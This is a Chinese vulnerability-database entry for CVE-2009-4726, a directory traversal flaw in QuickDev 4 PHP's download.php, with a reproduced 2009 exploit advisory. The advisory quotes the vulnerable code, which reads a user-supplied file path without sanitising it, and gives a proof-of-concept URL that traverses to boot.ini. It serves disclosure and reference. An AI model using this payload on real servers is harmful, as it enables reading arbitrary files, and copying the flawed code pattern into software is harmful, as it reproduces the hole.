Quickdev 4 PHP 'download.php'脚本 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118243 漏洞类型 路径遍历
发布时间 2009-08-03 更新时间 2009-08-03
CVE编号 CVE-2009-4726 CNNVD-ID CNNVD-201003-235
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/9334
https://www.securityfocus.com/bid/42555
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-235
|漏洞详情
Quickdev4PHP中的download.php脚本存在目录遍历漏洞。远程攻击者可以借助file参数中的".."符号遍历任何目录并读取任意文件。
|漏洞EXP
#####################################################################################
[+] QuickDev 4 Php (download.php file) Arbitrary File Download
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#####################################################################################

[+] Download : http://sourceforge.net/projects/quickdev4php/files/

[+] Arbitrary File Download

 - Vulnerable code in download.php

--------------------------------------------------------------------------

$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
@readfile($file);
die();

--------------------------------------------------------------------------

 - PoC

   http://127.0.0.1/download.php?file=../../../../../../boot.ini

#####################################################################################

# milw0rm.com [2009-08-03]
|受影响的产品
Olivier michaud and Pierre-Yves QuickDev 4 Php 0
|参考资料

来源:VUPEN
名称:ADV-2009-2126
链接:http://www.vupen.com/english/advisories/2009/2126
来源:MILW0RM
名称:9334
链接:http://www.milw0rm.com/exploits/9334
来源:SECUNIA
名称:36130
链接:http://secunia.com/advisories/36130